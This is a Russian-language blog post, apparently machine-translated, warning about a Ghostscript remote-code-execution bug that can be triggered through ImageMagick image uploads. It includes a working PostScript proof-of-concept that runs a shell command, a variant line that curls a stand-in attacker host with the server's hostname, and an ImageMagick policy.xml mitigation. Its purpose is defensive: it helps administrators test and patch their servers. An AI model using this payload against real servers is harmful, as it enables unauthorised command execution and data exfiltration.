Кратко: если у вас на сайте загружены изображения и вы их обрабатываете с помощью популярной библиотеки ImageMagick, то после загрузки изображения вы можете выполнить команду оболочки с правами пользователя веб-сервера (например: скачать RAT, майнер, объединить исходники, получить доступ в базу данных, вызвать сбой и т. д.) Странно, что хабросообщество пропустило эту новость( оригинальный ) о новых дырах в библиотеке GhostScript и, как следствие, во многих других библиотеках, использующих ее под капотом.Теги: #информационная безопасность #rce #разработка сайтов #ghostscript #imagickИтак, что мы имеем? Как проверить, уязвим ли ваш сервер? Берём и загружаем на сервер вместо образа тестовый .
ps файл.
Файл примера ниже не приносит особого вреда — он вызывает всего лишь 5-секундную задержку.
Если сервер отвечает более 5 секунд, то у вас проблема: либо ваш сервис уязвим, либо он оооочень медленный =)
Ключевая команда: спать 5 Альтернативной командой может быть%!PS % This is ghostscript bug 699714, a variant of 699687 (which is itself a variant of 699654).
userdict /setpagedevice undef a4 currentpagedevice /HWResolution get 0 (foobar) put { grestore } stopped clear % make sure we have a device with OutputFile (ppmraw) selectdevice mark /OutputFile (%pipe% `sleep 5`) currentdevice putdeviceprops { showpage } stopped pop quit
mark /OutputFile (%pipe% curl evilserver.su/GHOSTSCRIPT-RCE-HOOK/`hostname`) currentdevice putdeviceprops
или что-то гораздо менее безобидное.Существует множество векторов эксплуатации.
Помимо загрузки изображений в процессор, можно просто отправить жертве ссылку на файл .
ps, а поскольку в большинстве ОС при сохранении его на компьютер создается предварительный просмотр, это также вызывает эксплуатацию (проверено лично на Linux рабочий стол).
На момент написания ни один антивирус не определил тестовые файлы .
ps как опасные.
Что делать? К сожалению, несмотря на публикацию информации об уязвимости и исправление ошибки, обновления дистрибутива могут не содержать исправленной версии.
На серверах вы можете предварительно проверить тип изображения с помощью сторонней библиотеки, фильтровать файл политики политик ImageMagick/policy.xml и не обрабатывать уязвимые типы файлов.
SELinux также должен закрыть некоторые векторы атак, например, запись в нестандартные папки.
УПД: в комментариях пишут, что в библиотеке уязвимость до сих пор не исправлена! УПД2: исправление за исправление для imagemagick, запрещающее использование файлов PostScript и PDF эльфийская тропа : в файле /etc/ImageMagick-6/policy.xml или /etc/ImageMagick-7/policy.xml, в зависимости от версии ImageMagick, нужно написать:
<policymap> <policy domain="coder" rights="none" pattern="{EPS,PS2,PS3,PS,PDF,XPS}" /> </policymap>
В опросе могут участвовать только зарегистрированные пользователи.Войти , Пожалуйста.
Вы проверили свой сервер? 33,62% У меня неуязвимый сервер 39 5,17% У меня была уязвимость, но теперь ее нет 6 61,21% Мне нечего проверять 71 Проголосовали 116 пользователей.
72 пользователя воздержались.
-
Erp Как Карьера – Хорошо Или Плохо
19 Oct, 24 -
Как Обеспечить Анонимный Доступ В Интернет
19 Oct, 24 -
Сертификация Cisco Ccna Полезна
19 Oct, 24 -
Введение В Поисковую Оптимизацию
19 Oct, 24